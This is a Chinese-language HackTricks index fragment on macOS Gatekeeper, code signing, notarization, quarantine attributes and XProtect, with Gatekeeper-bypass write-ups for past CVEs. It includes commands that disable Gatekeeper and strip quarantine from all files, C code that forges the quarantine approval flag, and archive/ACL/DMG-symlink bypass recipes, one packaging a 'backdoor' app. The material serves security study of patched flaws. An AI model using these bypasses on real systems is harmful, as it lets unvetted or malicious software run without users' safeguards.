Quarantine / XProtect » Gatekeeper","id":"2553","title":"Gatekeeper"},"2554":{"body":"应用程序签名,也称为代码签名,是 Apple 安全基础设施的关键组成部分。它们用于 验证软件作者的身份 (开发者),并确保自上次签名以来代码未被篡改。 其工作原理如下: 签名应用程序: 当开发者准备分发他们的应用程序时,他们 使用私钥签名应用程序 。此私钥与 Apple 在开发者注册 Apple Developer Program 时向开发者颁发的 证书 相关联。签名过程涉及创建应用程序所有部分的加密哈希,并使用开发者的私钥对该哈希进行加密。 分发应用程序: 签名的应用程序随后与开发者的证书一起分发,该证书包含相应的公钥。 验证应用程序: 当用户下载并尝试运行该应用程序时,他们的 Mac 操作系统使用开发者证书中的公钥解密哈希。然后,它根据应用程序的当前状态重新计算哈希,并将其与解密后的哈希进行比较。如果它们匹配,则意味着 自开发者签名以来,应用程序未被修改 ,系统允许该应用程序运行。 应用程序签名是 Apple Gatekeeper 技术的重要组成部分。当用户尝试 打开从互联网下载的应用程序 时,Gatekeeper 会验证应用程序签名。如果它是由 Apple 向已知开发者颁发的证书签名,并且代码未被篡改,Gatekeeper 允许该应用程序运行。否则,它会阻止该应用程序并提醒用户。 从 macOS Catalina 开始, Gatekeeper 还检查应用程序是否经过 Apple 的公证 ,增加了一层额外的安全性。公证过程检查应用程序是否存在已知的安全问题和恶意代码,如果这些检查通过,Apple 会向应用程序添加一个 Gatekeeper 可以验证的票据。 检查签名 在检查某些 恶意软件样本 时,您应始终 检查二进制文件的签名 ,因为 签名的开发者 可能已经 与恶意软件相关 。 bash # Get signer\\ncodesign -vv -d /bin/ls 2>&1 | grep -E \\"Authority|TeamIdentifier\\" # Check if the app’s contents have been modified\\ncodesign --verify --verbose /Applications/Safari.app # Get entitlements from the binary\\ncodesign -d --entitlements :- /System/Applications/Automator.app # Check the TCC perms # Check if the signature is valid\\nspctl --assess --verbose /Applications/Safari.app # Sign a binary\\ncodesign -s 
toolsdemo","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » 应用程序签名","id":"2554","title":"应用程序签名"},"2555":{"body":"苹果的 notarization 过程作为额外的保护措施,旨在保护用户免受潜在有害软件的影响。它涉及 开发者提交他们的应用程序进行审查 ,由 苹果的 Notary Service 进行,这与应用审核不应混淆。该服务是一个 自动化系统 ,对提交的软件进行审查,以检查 恶意内容 和任何潜在的代码签名问题。 如果软件 通过 了这次检查而没有引发任何问题,Notary Service 会生成一个 notarization ticket。开发者随后需要 将此票据附加到他们的软件上 ,这个过程称为“stapling”。此外,notarization ticket 还会在线发布,Gatekeeper,苹果的安全技术,可以访问它。 在用户首次安装或执行软件时,notarization ticket 的存在 - 无论是附加在可执行文件上还是在线找到 - 通知 Gatekeeper 该软件已由苹果进行 notarization 。因此,Gatekeeper 在初始启动对话框中显示描述性消息,指示该软件已通过苹果的恶意内容检查。这个过程增强了用户对他们在系统上安装或运行的软件安全性的信心。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » Notarization","id":"2555","title":"Notarization"},"2556":{"body":"caution 请注意,从 Sequoia 版本开始, spctl 不再允许修改 Gatekeeper 配置。 spctl 是用于枚举和与 Gatekeeper 交互的 CLI 工具(通过 XPC 消息与 syspolicyd 守护进程交互)。例如,可以使用以下命令查看 GateKeeper 的 状态 : bash # Check the status\\nspctl --status caution 注意,GateKeeper 签名检查仅对 具有隔离属性的文件 进行,而不是对每个文件进行。 GateKeeper 将检查根据 首选项和签名 二进制文件是否可以执行: syspolicyd 是负责执行 Gatekeeper 的主要守护进程。它维护一个位于 /var/db/SystemPolicy 的数据库,可以在 这里找到支持该数据库的代码 ,在 这里找到 SQL 模板 。请注意,该数据库不受 SIP 限制,并且可以由 root 写入,数据库 /var/db/.SystemPolicy-default 用作原始备份,以防其他数据库损坏。 此外, /var/db/gke.bundle 和 /var/db/gkopaque.bundle 包含插入数据库的规则文件。您可以使用 root 检查此数据库: bash # Open database\\nsqlite3 /var/db/SystemPolicy # Get allowed rules\\nSELECT requirement,allow,disabled,label from authority where label != \'GKE\' and disabled=0;\\nrequirement|allow|disabled|label\\nanchor apple generic and certificate 1[subject.CN] = \\"Apple Software Update Certification Authority\\"|1|0|Apple Installer\\nanchor apple|1|0|Apple System\\nanchor apple generic and certificate leaf[field.1.2.840.113635.100.6.1.9] exists|1|0|Mac App Store\\nanchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] exists and (certificate 
leaf[field.1.2.840.113635.100.6.1.14] or certificate leaf[field.1.2.840.113635.100.6.1.13]) and notarized|1|0|Notarized Developer ID\\n[...] syspolicyd 还暴露了一个 XPC 服务器,具有不同的操作,如 assess、update、record 和 cancel,这些操作也可以通过 Security.framework 的 SecAssessment* API 访问,而 spctl 实际上通过 XPC 与 syspolicyd 进行通信。 注意第一个规则以 \\" App Store \\" 结束,第二个规则以 \\" Developer ID \\" 结束,并且在之前的图像中,它是 启用从 App Store 和已识别开发者执行应用程序 。 如果您 修改 该设置为 App Store,\\" Notarized Developer ID\\" 规则将消失 。 还有成千上万的 type GKE 规则: bash SELECT requirement,allow,disabled,label from authority where label = \'GKE\' limit 5;\\ncdhash H\\"b40281d347dc574ae0850682f0fd1173aa2d0a39\\"|1|0|GKE\\ncdhash H\\"5fd63f5342ac0c7c0774ebcbecaf8787367c480f\\"|1|0|GKE\\ncdhash H\\"4317047eefac8125ce4d44cab0eb7b1dff29d19a\\"|1|0|GKE\\ncdhash H\\"0a71962e7a32f0c2b41ddb1fb8403f3420e1d861\\"|1|0|GKE\\ncdhash H\\"8d0d90ff23c3071211646c4c9c607cdb601cb18f\\"|1|0|GKE 这些是来自以下路径的哈希值: /var/db/SystemPolicyConfiguration/gke.bundle/Contents/Resources/gke.auth /var/db/gke.bundle/Contents/Resources/gk.db /var/db/gkopaque.bundle/Contents/Resources/gkopaque.db 或者你可以用以下方式列出之前的信息: bash sudo spctl --list 选项 --master-disable 和 --global-disable 的 spctl 将完全 禁用 这些签名检查: bash # Disable GateKeeper\\nspctl --global-disable\\nspctl --master-disable # Enable it\\nspctl --global-enable\\nspctl --master-enable 当完全启用时,将出现一个新选项: 可以通过以下方式 检查一个应用是否会被 GateKeeper 允许 : bash spctl --assess -v /Applications/App.app 可以在 GateKeeper 中添加新规则,以允许某些应用程序的执行: bash # Check if allowed - nop\\nspctl --assess -v /Applications/App.app\\n/Applications/App.app: rejected\\nsource=no usable signature # Add a label and allow this label in GateKeeper\\nsudo spctl --add --label \\"whitelist\\" /Applications/App.app\\nsudo spctl --enable --label \\"whitelist\\" # Check again - yep\\nspctl --assess -v /Applications/App.app\\n/Applications/App.app: accepted 关于 内核扩展 ,文件夹 /var/db/SystemPolicyConfiguration 包含允许加载的 kext 列表文件。此外,spctl 拥有 com.apple.private.iokit.nvram-csr 权限,因为它能够添加需要在 NVRAM 中以 
kext-allowed-teams 键保存的新预批准内核扩展。 在 macOS 15 (Sequoia) 及更高版本上管理 Gatekeeper 从 macOS 15 Sequoia 开始,最终用户无法再通过 spctl 切换 Gatekeeper 策略。管理通过系统设置进行,或通过部署带有 com.apple.systempolicy.control 负载的 MDM 配置文件进行。示例配置文件片段以允许 App Store 和已识别的开发者(但不允许“任何地方”): xml \\n\\n\\n\\nPayloadContent\\n\\n\\nPayloadType\\ncom.apple.systempolicy.control\\nPayloadVersion\\n1\\nPayloadIdentifier\\ncom.example.gatekeeper\\nEnableAssessment\\n\\nAllowIdentifiedDevelopers\\n\\n\\n\\nPayloadType\\nConfiguration\\nPayloadIdentifier\\ncom.example.profile.gatekeeper\\nPayloadUUID\\n00000000-0000-0000-0000-000000000000\\nPayloadVersion\\n1\\nPayloadDisplayName\\nGatekeeper\\n\\n","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » spctl & syspolicyd","id":"2556","title":"spctl & syspolicyd"},"2557":{"body":"在 下载 应用程序或文件时,特定的 macOS 应用程序 (如网页浏览器或电子邮件客户端)会为下载的文件 附加一个扩展文件属性 ,通常称为“ 隔离标志 ”。此属性作为安全措施, 标记文件 来自不受信任的来源(互联网),并可能带来风险。然而,并非所有应用程序都会附加此属性,例如,常见的 BitTorrent 客户端软件通常会绕过此过程。 隔离标志的存在在用户尝试执行文件时向 macOS 的 Gatekeeper 安全功能发出信号 。 在 隔离标志不存在 的情况下(例如通过某些 BitTorrent 客户端下载的文件),Gatekeeper 的 检查可能不会执行 。因此,用户在打开来自不太安全或未知来源的文件时应保持谨慎。 [!NOTE] > 检查 代码签名的 有效性 是一个 资源密集型 的过程,包括生成代码及其所有捆绑资源的加密 哈希 。此外,检查证书有效性还涉及对 Apple 服务器进行 在线检查 ,以查看其在发放后是否被撤销。因此,完整的代码签名和公证检查在每次启动应用程序时 不切实际 。 因此,这些检查 仅在执行具有隔离属性的应用程序时运行 。 warning 此属性必须由 创建/下载 文件的应用程序 设置 。 然而,被沙盒化的文件将对它们创建的每个文件设置此属性。而非沙盒应用程序可以自行设置,或在 Info.plist 中指定 LSFileQuarantineEnabled 键,这将使系统在创建的文件上设置com.apple.quarantine扩展属性。 此外,所有调用**qtn_proc_apply_to_self**的进程创建的文件都将被隔离。或者,API **qtn_file_apply_to_path**将隔离属性添加到指定的文件路径。 可以使用以下命令 检查其状态并启用/禁用 (需要 root 权限): bash spctl --status\\nassessments enabled spctl --enable\\nspctl --disable\\n#You can also allow nee identifies to execute code using the binary \\"spctl\\" 您还可以通过以下方式 查找文件是否具有隔离扩展属性 : bash xattr file.png\\ncom.apple.macl\\ncom.apple.quarantine 检查 扩展 属性 的 值 ,并找出写入隔离属性的应用程序: bash xattr -l portada.png\\ncom.apple.macl:\\n00000000 03 00 53 DA 55 1B AE 4C 4E 88 9D CA B7 5C 50 
F3 |..S.U..LN.....P.|\\n00000010 16 94 03 00 27 63 64 97 98 FB 4F 02 84 F3 D0 DB |....\'cd...O.....|\\n00000020 89 53 C3 FC 03 00 27 63 64 97 98 FB 4F 02 84 F3 |.S....\'cd...O...|\\n00000030 D0 DB 89 53 C3 FC 00 00 00 00 00 00 00 00 00 00 |...S............|\\n00000040 00 00 00 00 00 00 00 00 |........|\\n00000048\\ncom.apple.quarantine: 00C1;607842eb;Brave;F643CD5F-6071-46AB-83AB-390BA944DEC5\\n# 00c1 -- It has been allowed to eexcute this file (QTN_FLAG_USER_APPROVED = 0x0040)\\n# 607842eb -- Timestamp\\n# Brave -- App\\n# F643CD5F-6071-46AB-83AB-390BA944DEC5 -- UID assigned to the file downloaded 实际上,一个进程“可以为它创建的文件设置隔离标志”(我已经尝试在创建的文件中应用 USER_APPROVED 标志,但它不会应用): 源代码应用隔离标志\\nc #include \\n#include enum qtn_flags {\\nQTN_FLAG_DOWNLOAD = 0x0001,\\nQTN_FLAG_SANDBOX = 0x0002,\\nQTN_FLAG_HARD = 0x0004,\\nQTN_FLAG_USER_APPROVED = 0x0040,\\n}; #define qtn_proc_alloc _qtn_proc_alloc\\n#define qtn_proc_apply_to_self _qtn_proc_apply_to_self\\n#define qtn_proc_free _qtn_proc_free\\n#define qtn_proc_init _qtn_proc_init\\n#define qtn_proc_init_with_self _qtn_proc_init_with_self\\n#define qtn_proc_set_flags _qtn_proc_set_flags\\n#define qtn_file_alloc _qtn_file_alloc\\n#define qtn_file_init_with_path _qtn_file_init_with_path\\n#define qtn_file_free _qtn_file_free\\n#define qtn_file_apply_to_path _qtn_file_apply_to_path\\n#define qtn_file_set_flags _qtn_file_set_flags\\n#define qtn_file_get_flags _qtn_file_get_flags\\n#define qtn_proc_set_identifier _qtn_proc_set_identifier typedef struct _qtn_proc *qtn_proc_t;\\ntypedef struct _qtn_file *qtn_file_t; int qtn_proc_apply_to_self(qtn_proc_t);\\nvoid qtn_proc_init(qtn_proc_t);\\nint qtn_proc_init_with_self(qtn_proc_t);\\nint qtn_proc_set_flags(qtn_proc_t, uint32_t flags);\\nqtn_proc_t qtn_proc_alloc();\\nvoid qtn_proc_free(qtn_proc_t);\\nqtn_file_t qtn_file_alloc(void);\\nvoid qtn_file_free(qtn_file_t qf);\\nint qtn_file_set_flags(qtn_file_t qf, uint32_t flags);\\nuint32_t qtn_file_get_flags(qtn_file_t qf);\\nint 
qtn_file_apply_to_path(qtn_file_t qf, const char *path);\\nint qtn_file_init_with_path(qtn_file_t qf, const char *path);\\nint qtn_proc_set_identifier(qtn_proc_t qp, const char* bundleid); int main() { qtn_proc_t qp = qtn_proc_alloc();\\nqtn_proc_set_identifier(qp, \\"xyz.hacktricks.qa\\");\\nqtn_proc_set_flags(qp, QTN_FLAG_DOWNLOAD | QTN_FLAG_USER_APPROVED);\\nqtn_proc_apply_to_self(qp);\\nqtn_proc_free(qp); FILE *fp;\\nfp = fopen(\\"thisisquarantined.txt\\", \\"w+\\");\\nfprintf(fp, \\"Hello Quarantine\\\\n\\");\\nfclose(fp); return 0; } 并 移除 该属性: bash xattr -d com.apple.quarantine portada.png\\n#You can also remove this attribute from every file with\\nfind . -iname \'*\' -print0 | xargs -0 xattr -d com.apple.quarantine 并使用以下命令查找所有隔离的文件: bash find / -exec ls -ld {} \\\\; 2>/dev/null | grep -E \\"[x\\\\-]@ \\" | awk \'{printf $9; printf \\"\\\\n\\"}\' | xargs -I {} xattr -lv {} | grep \\"com.apple.quarantine\\" Quarantine information is also stored in a central database managed by LaunchServices in ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 which allows the GUI to obtain data about the file origins. Moreover this can be overwritten by applications which might be interested in hiding its origins. Moreover, this can be done from LaunchServices APIS. libquarantine.dylib 这个库导出几个函数,允许操作扩展属性字段。 qtn_file_* APIs 处理文件隔离政策,qtn_proc_* APIs 应用于进程(由进程创建的文件)。未导出的 __qtn_syscall_quarantine* 函数是应用政策的函数,它调用 mac_syscall,第一个参数为 \\"Quarantine\\",将请求发送到 Quarantine.kext。 Quarantine.kext 内核扩展仅通过 系统上的内核缓存 可用;然而,你 可以 从 https://developer.apple.com/ 下载 Kernel Debug Kit ,其中将包含该扩展的符号化版本。 这个 Kext 将通过 MACF 钩住多个调用,以捕获所有文件生命周期事件:创建、打开、重命名、硬链接... 
甚至 setxattr 以防止其设置 com.apple.quarantine 扩展属性。 它还使用了一些 MIBs: security.mac.qtn.sandbox_enforce: 强制隔离与沙箱 security.mac.qtn.user_approved_exec: 隔离的进程只能执行已批准的文件 Provenance xattr (Ventura 及更高版本) macOS 13 Ventura 引入了一个单独的来源机制,该机制在第一次允许隔离应用运行时填充。创建了两个工件: .app 包目录上的 com.apple.provenance xattr(固定大小的二进制值,包含主键和标志)。 在 /var/db/SystemPolicyConfiguration/ExecPolicy/ 内的 ExecPolicy 数据库中的 provenance_tracking 表中的一行,存储应用的 cdhash 和元数据。 Practical usage: bash # Inspect provenance xattr (if present)\\nxattr -p com.apple.provenance /Applications/Some.app | hexdump -C # Observe Gatekeeper/provenance events in real time\\nlog stream --style syslog --predicate \'process == \\"syspolicyd\\"\' # Retrieve historical Gatekeeper decisions for a specific bundle\\nlog show --last 2d --style syslog --predicate \'process == \\"syspolicyd\\" && eventMessage CONTAINS[cd] \\"GK scan\\"\'","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » 隔离文件","id":"2557","title":"隔离文件"},"2558":{"body":"XProtect 是 macOS 中内置的 反恶意软件 功能。XProtect 在应用程序首次启动或修改时检查其与已知恶意软件和不安全文件类型的数据库 。当您通过某些应用程序(如 Safari、Mail 或 Messages)下载文件时,XProtect 会自动扫描该文件。如果它与数据库中的任何已知恶意软件匹配,XProtect 将 阻止文件运行 并提醒您存在威胁。 XProtect 数据库由 Apple 定期更新 新的恶意软件定义,这些更新会自动下载并安装到您的 Mac 上。这确保了 XProtect 始终与最新的已知威胁保持同步。 然而,值得注意的是 XProtect 不是一个功能齐全的杀毒解决方案 。它仅检查特定的已知威胁列表,并不像大多数杀毒软件那样执行按需扫描。 您可以获取有关最新 XProtect 更新的信息: bash system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 \\"XProtectPlistConfigData\\" | tail -n 5 XProtect 位于 SIP 保护位置 /Library/Apple/System/Library/CoreServices/XProtect.bundle ,在该捆绑包中可以找到 XProtect 使用的信息: XProtect.bundle/Contents/Resources/LegacyEntitlementAllowlist.plist :允许具有这些 cdhash 的代码使用遗留权限。 XProtect.bundle/Contents/Resources/XProtect.meta.plist :不允许通过 BundleID 和 TeamID 加载的插件和扩展的列表,或指示最低版本。 XProtect.bundle/Contents/Resources/XProtect.yara :检测恶意软件的 Yara 规则。 XProtect.bundle/Contents/Resources/gk.db :包含被阻止应用程序和 TeamIDs 哈希的 SQLite3 数据库。 请注意, 
/Library/Apple/System/Library/CoreServices/XProtect.app 中还有另一个与 XProtect 相关的应用程序,但它与 Gatekeeper 过程无关。 XProtect Remediator:在现代 macOS 中,Apple 提供按需扫描器(XProtect Remediator),定期通过 launchd 运行以检测和修复恶意软件家族。您可以在统一日志中观察这些扫描: log show --last 2h --predicate \'subsystem == \\"com.apple.XProtectFramework\\" || category CONTAINS \\"XProtect\\"\' --style syslog","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » XProtect","id":"2558","title":"XProtect"},"2559":{"body":"caution 请注意,Gatekeeper 并不是每次 执行应用程序时都会被执行,只有 AppleMobileFileIntegrity (AMFI) 会在您执行已经由 Gatekeeper 执行和验证的应用程序时 验证可执行代码签名 。 因此,之前可以执行一个应用程序以便用 Gatekeeper 缓存它,然后 修改应用程序的非可执行文件 (如 Electron asar 或 NIB 文件),如果没有其他保护措施,应用程序将 执行 带有 恶意 附加内容的版本。 然而,现在这已不再可能,因为 macOS 防止修改 应用程序捆绑包中的文件。因此,如果您尝试 Dirty NIB 攻击,您会发现不再可能利用它,因为在执行应用程序以用 Gatekeeper 缓存它后,您将无法修改捆绑包。如果您例如将 Contents 目录的名称更改为 NotCon(如漏洞中所示),然后执行应用程序的主二进制文件以用 Gatekeeper 缓存它,将会触发错误并且无法执行。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » 不是 Gatekeeper","id":"2559","title":"不是 Gatekeeper"},"256":{"body":"DTLS服务器配置: 浏览器充当DTLS服务器的实例或媒体服务器未使用临时端口进行媒体会话的情况不易受到此漏洞的影响。","breadcrumbs":"Pentesting Network » WebRTC DoS » 非易受攻击场景","id":"256","title":"非易受攻击场景"},"2560":{"body":"任何绕过 Gatekeeper 的方法(设法让用户下载某些内容并在 Gatekeeper 应该禁止时执行它)都被视为 macOS 中的漏洞。这些是一些分配给过去允许绕过 Gatekeeper 的技术的 CVE:","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » Gatekeeper 绕过","id":"2560","title":"Gatekeeper 绕过"},"2561":{"body":"观察到如果使用 Archive Utility 进行提取,路径超过 886 个字符 的文件不会接收 com.apple.quarantine 扩展属性。这种情况无意中允许这些文件 绕过 Gatekeeper 的 安全检查。 查看 原始报告 以获取更多信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » CVE-2021-1810","id":"2561","title":"CVE-2021-1810"},"2562":{"body":"当使用 Automator 创建应用程序时,关于其执行所需的信息位于 
application.app/Contents/document.wflow 中,而不在可执行文件中。可执行文件只是一个名为 Automator Application Stub 的通用 Automator 二进制文件。 因此,您可以使 application.app/Contents/MacOS/Automator\\\\ Application\\\\ Stub 通过符号链接指向系统内的另一个 Automator Application Stub ,它将执行 document.wflow 中的内容(您的脚本) 而不会触发 Gatekeeper ,因为实际的可执行文件没有隔离 xattr。 示例预期位置:/System/Library/CoreServices/Automator\\\\ Application\\\\ Stub.app/Contents/MacOS/Automator\\\\ Application\\\\ Stub 查看 原始报告 以获取更多信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » CVE-2021-30990","id":"2562","title":"CVE-2021-30990"},"2563":{"body":"在此绕过中,创建了一个 zip 文件,应用程序开始从 application.app/Contents 压缩,而不是从 application.app。因此, 隔离属性 应用于所有 来自 application.app/Contents 的文件 ,但 不适用于 application.app ,这是 Gatekeeper 检查的内容,因此 Gatekeeper 被绕过,因为当触发 application.app 时 没有隔离属性。 bash zip -r test.app/Contents test.zip 查看 原始报告 以获取更多信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » CVE-2022-22616","id":"2563","title":"CVE-2022-22616"},"2564":{"body":"即使组件不同,此漏洞的利用与之前的非常相似。在这种情况下,将从 application.app/Contents 生成一个 Apple Archive,因此 application.app 在通过 Archive Utility 解压时不会获得隔离属性 。 bash aa archive -d test.app/Contents -o test.app.aar 检查 原始报告 以获取更多信息。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » CVE-2022-32910","id":"2564","title":"CVE-2022-32910"},"2565":{"body":"ACL writeextattr 可用于防止任何人向文件中写入属性: bash touch /tmp/no-attr\\nchmod +a \\"everyone deny writeextattr\\" /tmp/no-attr\\nxattr -w attrname vale /tmp/no-attr\\nxattr: [Errno 13] Permission denied: \'/tmp/no-attr\' 此外, AppleDouble 文件格式复制了一个文件及其 ACE。 在 源代码 中,可以看到存储在名为 com.apple.acl.text 的 xattr 中的 ACL 文本表示将被设置为解压缩文件中的 ACL。因此,如果您将一个应用程序压缩成一个带有 ACL 的 AppleDouble 文件格式的 zip 文件,该 ACL 阻止其他 xattrs 被写入... 
那么隔离 xattr 并没有被设置到该应用程序中: bash chmod +a \\"everyone deny write,writeattr,writeextattr\\" /tmp/test\\nditto -c -k test test.zip\\npython3 -m http.server\\n# Download the zip from the browser and decompress it, the file should be without a quarantine xattr 查看 原始报告 以获取更多信息。 请注意,这也可以通过AppleArchives进行利用: bash mkdir app\\ntouch app/test\\nchmod +a \\"everyone deny write,writeattr,writeextattr\\" app/test\\naa archive -d app -o test.aar","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » CVE-2022-42821","id":"2565","title":"CVE-2022-42821"},"2566":{"body":"发现 Google Chrome没有为下载的文件设置隔离属性 ,这是由于一些macOS内部问题。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » CVE-2023-27943","id":"2566","title":"CVE-2023-27943"},"2567":{"body":"AppleDouble文件格式将文件的属性存储在以._开头的单独文件中,这有助于在 macOS机器之间 复制文件属性。然而,注意到在解压AppleDouble文件后,以._开头的文件 没有被赋予隔离属性 。 bash mkdir test\\necho a > test/a\\necho b > test/b\\necho ._a > test/._a\\naa archive -d test/ -o test.aar # If you downloaded the resulting test.aar and decompress it, the file test/._a won\'t have a quarantitne attribute 能够创建一个不会设置隔离属性的文件,使得 能够绕过 Gatekeeper。 这个技巧是 使用 AppleDouble 命名约定创建一个 DMG 文件应用程序 (以 ._ 开头),并创建一个 作为此隐藏文件的符号链接的可见文件 ,而没有隔离属性。 当 dmg 文件被执行 时,由于它没有隔离属性,它将 绕过 Gatekeeper。 bash # Create an app bundle with the backdoor an call it app.app echo \\"[+] creating disk image with app\\"\\nhdiutil create -srcfolder app.app app.dmg echo \\"[+] creating directory and files\\"\\nmkdir\\nmkdir -p s/app\\ncp app.dmg s/app/._app.dmg\\nln -s ._app.dmg s/app/app.dmg echo \\"[+] compressing files\\"\\naa archive -d s/ -o app.aar","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » CVE-2023-27951","id":"2567","title":"CVE-2023-27951"},"2568":{"body":"在 macOS Sonoma 14.0 中修复的 Gatekeeper 
绕过漏洞允许经过精心制作的应用程序在没有提示的情况下运行。补丁发布后,详细信息被公开披露,并且在修复之前该问题在野外被积极利用。确保安装了 Sonoma 14.0 或更高版本。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » [CVE-2023-41067]","id":"2568","title":"[CVE-2023-41067]"},"2569":{"body":"在 macOS 14.4(2024年3月发布)中,源于 libarchive 对恶意 ZIP 文件的处理的 Gatekeeper 绕过漏洞允许应用程序逃避评估。更新到 14.4 或更高版本,Apple 已解决该问题。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » [CVE-2024-27853]","id":"2569","title":"[CVE-2024-27853]"},"257":{"body":"此漏洞突显了媒体会话初始化过程中的微妙平衡,以及需要精确的时序和验证机制以防止利用。建议开发人员实施推荐的安全修复,并确保强大的验证过程以缓解此类漏洞。 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » WebRTC DoS » 结论","id":"257","title":"结论"},"2570":{"body":"流行提取工具(例如 The Unarchiver)中的几个漏洞导致从归档中提取的文件缺少 com.apple.quarantine xattr,从而启用了 Gatekeeper 绕过的机会。在测试时始终依赖 macOS Archive Utility 或已修补的工具,并在提取后验证 xattrs。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » 第三方解压工具错误传播隔离 (2023–2024)","id":"2570","title":"第三方解压工具错误传播隔离 (2023–2024)"},"2571":{"body":"创建一个包含应用程序的目录。 将 uchg 添加到应用程序。 将应用程序压缩为 tar.gz 文件。 将 tar.gz 文件发送给受害者。 受害者打开 tar.gz 文件并运行应用程序。 Gatekeeper 不会检查该应用程序。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » uchg (来自这个 talk )","id":"2571","title":"uchg (来自这个 talk )"},"2572":{"body":"在 \\".app\\" 包中,如果没有添加隔离 xattr,当执行时 Gatekeeper 不会被触发 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » 防止隔离 
xattr","id":"2572","title":"防止隔离 xattr"},"2573":{"body":"Apple Platform Security: About the security content of macOS Sonoma 14.4 (includes CVE-2024-27853) – https://support.apple.com/en-us/HT214084 Eclectic Light: How macOS now tracks the provenance of apps – https://eclecticlight.co/2023/05/10/how-macos-now-tracks-the-provenance-of-apps/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Gatekeeper / Quarantine / XProtect » References","id":"2573","title":"References"},"2574":{"body":"Reading time: 13 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » macOS 启动/环境约束与信任缓存","id":"2574","title":"macOS 启动/环境约束与信任缓存"},"2575":{"body":"macOS 中的启动约束旨在通过 规范进程的启动方式、启动者和启动来源 来增强安全性。自 macOS Ventura 开始引入,它们提供了一个框架,将 每个系统二进制文件分类为不同的约束类别 ,这些类别在 信任缓存 中定义,该列表包含系统二进制文件及其各自的哈希值。这些约束扩展到系统中的每个可执行二进制文件,涉及一组 规则 ,规定了 启动特定二进制文件的要求 。规则包括二进制文件必须满足的自我约束、其父进程必须满足的父约束,以及其他相关实体必须遵守的责任约束​。 该机制通过 环境约束 扩展到第三方应用程序,自 macOS Sonoma 开始,允许开发者通过指定 一组环境约束的键和值 来保护他们的应用程序。 您可以在约束字典中定义 启动环境和库约束 ,这些字典可以保存在**launchd 属性列表文件 中,或在代码签名中使用的 单独属性列表**文件中。 约束有 4 种类型: 自我约束 :应用于 运行中的 二进制文件的约束。 父进程 :应用于 进程的父进程 的约束(例如 launchd 运行 XP 服务) 责任约束 :应用于 在 XPC 通信中调用服务的进程 的约束 库加载约束 :使用库加载约束选择性地描述可以加载的代码 因此,当一个进程尝试通过调用 execve(_:_:_:) 或 posix_spawn(_:_:_:_:_:_:) 启动另一个进程时,操作系统会检查 可执行 文件是否 满足 其 自身的自我约束 。它还会检查 父进程 的可执行文件是否 满足 可执行文件的 父约束 ,以及 责任进程 的可执行文件是否 满足 可执行文件的责任进程约束。如果这些启动约束中的任何一个不满足,操作系统将不会运行该程序。 如果在加载库时, 库约束 的任何部分不成立,您的进程 将不会加载 该库。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Security Protections » macOS Launch/Environment Constraints & Trust Cache » 